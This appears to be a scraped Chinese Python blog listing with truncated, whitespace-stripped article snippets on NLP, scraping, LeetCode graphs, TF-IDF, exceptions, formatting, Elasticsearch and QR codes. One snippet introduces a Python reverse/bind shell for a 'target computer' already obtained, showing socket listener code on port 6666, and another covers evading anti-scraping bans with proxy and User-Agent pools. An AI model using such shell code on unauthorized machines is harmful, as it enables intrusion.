简单的问答已经实现了,那么问题也跟着出现了,我不能确定问题一定是"你叫什么名字",也有可能是"你是谁","你叫啥"之类的,这就引出了人工智能中的另一项技术:自然语言处理(NLP):大概意思就是让计算机明白一句话要表达的意思,NLP就相当于计算机在思考你说的话,让计算机知道"你是谁","你叫啥","你叫什么名字"是一个意思这就要做:语义相似度接下来我们用Python大法来实现一个简单的自然语言处理现在又要用到Python强大的三方库了第一个是将中文字符串进行
系统 2019-09-27 17:57:46 2231
爬取图片方法一:requests#!/usr/bin/python2.7#-*-coding:utf-8-*-importreimportrequestsimportosimportshutilsuyan_url='http://www.xiaohuar.com/s-1-2069.html'response=requests.get(suyan_url)#print(response.content)lists=re.findall(r'href="(?:
系统 2019-09-27 17:53:30 2231
解决Python3控制台输出InsecureRequestWarning的问题问题:使用Python3requests发送HTTPS请求,已经关闭认证(verify=False)情况下,控制台会输出以下错误:InsecureRequestWarning:UnverifiedHTTPSrequestisbeingmade.Addingcertificateverificationisstronglyadvised.See:https://urllib3.re
系统 2019-09-27 17:52:19 2231
文章目录785.判断二分图(图DFS,染色)207.课程表(拓扑排序,有向无环图)684.冗余连接(并查集)695.岛屿的最大面积(DFS)200.岛屿数量(DFS)463.岛屿的周长785.判断二分图(图DFS,染色)给定一个无向图graph,当这个图为二分图时返回true。如果我们能将一个图的节点集合分割成两个独立的子集A和B,并使图中的每一条边的两个节点一个来自A集合,一个来自B集合,我们就将这个图称为二分图。graph将会以邻接表方式给出,grap
系统 2019-09-27 17:49:17 2231
思路:1.读取所有文章标题;2.用“结巴分词”的工具包进行文章标题的词语分割;3.用“sklearn”的工具包计算Tf-idf(词频-逆文档率);4.得到满足关键词权重阈值的词结巴分词详见:结巴分词Githubsklearn详见:文本特征提取――4.2.3.4Tf-idf项加权importosimportjiebaimportsysfromsklearn.feature_extraction.textimportTfidfVectorizersys.pat
系统 2019-09-27 17:48:06 2231
#!/usr/bin/envpython#coding:utf8importos,sysimportmd5,tabfrommysql_co.my_dbimportset_mysqlfromssh_co.ssh_connectimportsshdfromssh_co.cfg.configimportssh_message,item_pathfromfileimportfindfiledefmy_mysql():db_file={}my_connect=set
系统 2019-09-27 17:45:42 2231
最近,做个小项目经常会遇到Python的异常,让人非常头疼,故对异常进行整理,避免下次遇到异常不知所措,以下就是对Python异常进行的整理。1.Python异常类异常描述NameError尝试访问一个没有申明的变量ZeroDivisionError除数为0SyntaxError语法错误IndexError索引超出序列范围KeyError请求一个不存在的字典关键字IOError输入输出错误(比如你要读的文件不存在)AttributeError尝试访问未知的
系统 2019-09-27 17:37:56 2231
有的时候我们在获取到目标电脑时候如果对方电脑又python编译环境时可以利用python反弹shell主要用到pythonos库和sokect库这里的服务端在目标机上运行fromsocketimport*fromosimport*s=socket(AF_INET,SOCK_STREAM)#IVP4寻址tcp协议s.bind(('',6666))#补丁端口s.listen(1)#开始监听一个队列whileTrue:sock,addr=s.accept()#返
系统 2019-09-27 17:56:43 2230
在现实的图像操作软件中,经常碰到的不是给出放大多少倍,而是由用户在软件的界面上选择多大的区域,或者选择几个点,那么这样情况下,怎么样来计算出变换矩阵呢?从前面知道变换矩阵是2X3的矩阵,说明有六个未知数,又有中学的代数知识知道要解决六个未知数,那么方程组至少要联立三条方程,要准备三条方程的先决条件,就是要有三组坐标。因此,只要在用户选择的区域里找到三个不同点的坐标,就可以计算出变换矩阵。如果给出三组坐标[0,0],[200,0],[0,200],通过变换之
系统 2019-09-27 17:56:19 2230
简介python动态执行字符串代码片段(也可以是文件),一般会用到exec,eval。execexec_stmt::="exec"or_expr["in"expression[","expression]]注意:exec是一个语法声明,不是一个函数.也就是说和if,for一样.官方文档对于exec的解释ThisstatementsupportsdynamicexecutionofPythoncode.exec的第一个表达式可以是:1.代码字符串2.文件对象
系统 2019-09-27 17:53:01 2230
目录:1、%用法2、format用法一、%用法1、整数的格式化%o——oct八进制%d——dec十进制%x——hex十六进制例>>>print('%o'%20)24>>>print('%d'%20)20>>>print('%x'%20)142、浮点数的格式化%e——保留小数点后面六位有效数字,指数形式输出%.3e,保留3位小数位,使用科学计数法%f——保留小数点后面六位有效数字%.3f,保留3位小数位%g——在保证六位有效数字的前提下,使用小数方式,否则使
系统 2019-09-27 17:52:22 2230
常见的反爬机制及处理方式1、Headers反爬虫:Cookie、Referer、User-Agent解决方案:通过F12获取headers,传给requests.get()方法2、IP限制:网站根据IP地址访问频率进行反爬,短时间内进制IP访问解决方案:1、构造自己IP代理池,每次访问随机选择代理,经常更新代理池2、购买开放代理或私密代理IP3、降低爬取的速度3、User-Agent限制:类似于IP限制解决方案:构造自己的User-Agent池,每次访问随
系统 2019-09-27 17:51:32 2230
今天我想讲一讲关于Elasticsearch的索引建立,当然提前是你已经安装部署好Elasticsearch。ok,先来介绍一下Elaticsearch,它是一款基于lucene的实时分布式搜索和分析引擎,是后台系统,用来存储数据,检索数据,属于完全命令行交互。那为什么选择python作为脚本进行命令的写入和数据的上传呢?那是因为Python里面有固定的模板,可以上传数据到Elasticsearch。接下来就聊一聊该如何编写代码:我们上传数据之后,数据到哪
系统 2019-09-27 17:51:02 2230
前言在JavaWeb开发中,一般使用Zxing来生成和识别二维码,但是,Zxing的识别有点差强人意,不少相对模糊的二维码识别率很低。不过就最新版本的测试来说,识别率有了现显著提高。对比在没接触Python之前,曾使用Zbar的客户端进行识别,测了大概几百张相对模糊的图片,Zbar的识别速度要快很多,识别率也比Zxing稍微准确那边一丢丢,但是,稍微模糊一点就无法识别。相比之下,微信和支付宝的识别效果就逆天了。代码案例#-*-coding:utf-8-*-
系统 2019-09-27 17:50:56 2230
本文是一篇个人总结,win10下anaconda3+python3.7+pycharm2018.3.4环境配置。下次再配置就方便许多。注意:win10下配置python环境方法十分多,总体分两类:1.下载python和pycharm,然后将pycharm的环境解释器改为python.exe2.下载anaconda,anaconda会自带python,然后下载pycharm,将pycharm的环境解释器更改为anaconda路径的python.exe。(an
系统 2019-09-27 17:47:49 2230